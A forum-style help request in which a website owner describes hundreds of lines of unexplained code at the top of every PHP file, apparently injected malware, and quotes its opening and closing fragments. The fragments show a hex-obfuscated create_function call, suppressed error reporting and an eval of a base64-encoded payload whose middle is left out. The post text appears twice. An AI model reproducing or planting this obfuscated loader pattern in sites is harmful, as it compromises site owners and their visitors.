All of the PHP files in our website have developed error reports at the top that are hundreds of lines long.
There is also content disappearing from the bottom of some of the webpages.
The error report starts like this
<?php $zend_framework ="\x63\162\x65\ 141\x74\145\x5f \146\x75\156\x6 3\164\x69\157\x 6e"; @error_reportin g(0); $zend_framework ("", "\x7d\73\x40\14 5\x76\141\x6c\5 0\x40\142\x61\1 63\x65\66\x34\1 37\x64\145\x63\ 157\x64\145\x28 \42\x4a\107\x56 \62YTFmWTJiYWsx Y3owaXIgPSAiXHg 2NlwxNjVceDZlXD E0M1x4NzRcMTUxX Hg2ZlwxNTZceDVm XDE0NVx4NzhcMTU xXHg
And after hundreds of lines it ends like this:
eDI0XDYxIiwgJGV 2YTFmWTJibzYxem 84bDcsMSk7DQogf SBlbHNlIHsgcmV0 dXJuICRldmExZlk yYm82MXpvOGw3Oy B9DQogfSB9DQokZ XZhMWZZMmJvNjF6 bzgxNyA9ICJceDZ mXDE0Mlx4NWZcMT YzXHg3NFwxNDFce DcyXDE2NCI7ICRl dmExZlkyYm82MXp vODE3KCJceDY1XD E2Nlx4NjFcNjFce DY2XDEzMVx4MzJc MTQyXHg2MVwxNTN ceDMxXDE0M1x4NT ZcNjJceDY5XDE2M iIpOw0KCX0\x4e\ 103\x6e\60\x3d\ 42\x29\51\x3b\5 7\x2f"); ?><?
There is no explanation of what the report means. Does you have any clue what could cause this?
There is also content disappearing from the bottom of some of the webpages.
The error report starts like this
<?php $zend_framework ="\x63\162\x65\ 141\x74\145\x5f \146\x75\156\x6 3\164\x69\157\x 6e"; @error_reportin g(0); $zend_framework ("", "\x7d\73\x40\14 5\x76\141\x6c\5 0\x40\142\x61\1 63\x65\66\x34\1 37\x64\145\x63\ 157\x64\145\x28 \42\x4a\107\x56 \62YTFmWTJiYWsx Y3owaXIgPSAiXHg 2NlwxNjVceDZlXD E0M1x4NzRcMTUxX Hg2ZlwxNTZceDVm XDE0NVx4NzhcMTU xXHg
And after hundreds of lines it ends like this:
eDI0XDYxIiwgJGV 2YTFmWTJibzYxem 84bDcsMSk7DQogf SBlbHNlIHsgcmV0 dXJuICRldmExZlk yYm82MXpvOGw3Oy B9DQogfSB9DQokZ XZhMWZZMmJvNjF6 bzgxNyA9ICJceDZ mXDE0Mlx4NWZcMT YzXHg3NFwxNDFce DcyXDE2NCI7ICRl dmExZlkyYm82MXp vODE3KCJceDY1XD E2Nlx4NjFcNjFce DY2XDEzMVx4MzJc MTQyXHg2MVwxNTN ceDMxXDE0M1x4NT ZcNjJceDY5XDE2M iIpOw0KCX0\x4e\ 103\x6e\60\x3d\ 42\x29\51\x3b\5 7\x2f"); ?><?
There is no explanation of what the report means. Does you have any clue what could cause this?